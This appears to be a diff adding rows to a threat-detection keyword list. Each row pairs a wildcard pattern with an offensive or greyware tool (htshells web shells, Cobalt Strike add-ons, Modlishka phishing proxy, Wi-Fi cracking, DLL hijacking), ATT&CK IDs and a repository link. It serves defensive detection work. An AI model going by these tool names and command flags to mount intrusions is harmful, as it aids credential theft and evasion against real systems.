+"*MockDirUACBypass*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. 
A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*MockDirUACBypassDll*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*Mockingjay_BOF.sln*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" +"*Mockingjay_BOF-main*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" +"*mod_auth_remote.phish.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_buster.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - 
TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*mod_caucho.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_cgi.shell.bash.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_cgi.shell.bind.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_cgi.shell.windows.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_mono.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_multi.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 
- T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_nikto.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*mod_perl.embperl.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_perl.IPP.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_perl.Mason.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_perl.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_php.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - 
T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_php.shell2.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_php.stealth-shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_python.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_rivet.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_ruby.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_sendmail.rce.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and 
attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_shellshock.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*mod_wp_enum.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*modDetective*","offensive_tool_keyword","modDetective","modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in red team engagements and CTFs in order to pinpoint where escalation and attack vectors may exist. This is especially true in CTFs. in which files associated with the challenges often have a much newer modification date than standard files that exist from install.","T1003 - T1036 - T1057","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/itsKindred/modDetective","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*--mode 3 --type handshake --essid * --verbose -d dicts/* --read *.cap*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. 
supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","0","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" +"*--mode 3 --type pmkid --verbose -d dicts/* --read *.txt*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","0","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" +"*--mode com --acl --csv *","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*--mode com --procmon *","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*--mode dll --existing --pml *","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*--mode dll --procmon *","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*--mode proxy --action prototypes --path *prototypes.csv*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*--mode proxy --dll *.dll*--external-resources*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*--mode proxy --ghidra *--dll *","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*ModifiedVulnerableBinaryFormatters\info.txt*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*Modlishka/config*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*MODLISHKA_BIN*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","0","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*Modlishka-linux-amd64*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*Modlishka-windows-*-amd64.exe*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. 
which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*modprobe -r*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*modprobe --remove*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*modprobe rmmod -r*","greyware_tool_keyword","modproble","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. 
This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*module inject *","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z"
+"*modules*daclread.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*modules/enumrate.py*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z"
+"*modules/exploits/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*modules/exploits/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*mogwailabs*","offensive_tool_keyword","Github Username","MOGWAI LABS is an infosec boutique with a strong emphasis on offensive security github repo hosting offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mogwailabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*mojo.5688.8052.183894939787088877##*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","pipe name","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z"
+"*mojo.5688.8052.35780273329370473##*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","pipe name","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z"
+"*mojo_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*monero2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*money2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*mongodb2john.js*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*Monkey Island v*_windows.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation 
tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*monkey*tunnel.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*monkey\infection_monkey*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*monkey_island.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*monkey32.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*monkey64.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*monkey-linux-32*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*monkey-linux-64*","offensive_tool_keyword","monkey","Infection Monkey - An 
automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*monkey-windows-32.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*monkey-windows-64.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*monoxgas/sRDI*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z"
+"*moonD4rk/HackBrowserData*","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","84","15","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z"
+"*MooseDojo*","offensive_tool_keyword","Github Username","github repo that was hosting exploitation tools. may be used by other exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/MooseDojo","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*morphHTA*","offensive_tool_keyword","morphHTA","morphHTA - Morphing Cobalt Strikes evil.HTA payload generator","T1059.007 - T1027.002 - T1564.001 - T1547.001","TA0002 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/vysecurity/morphHTA","1","1","N/A","N/A","6","503","142","2023-04-14T19:15:57Z","2017-02-24T11:27:00Z"
+"*mortar-main.zip*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z"
+"*mosquitto2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*Mount-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*mousejack*","offensive_tool_keyword","mousejack","MouseJack device discovery and research tools","T1179 - T1059 - T1065 - T1057","TA0011 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BastilleResearch/mousejack","1","1","N/A","N/A","10","1203","255","2017-12-19T10:16:25Z","2016-02-23T14:19:38Z"
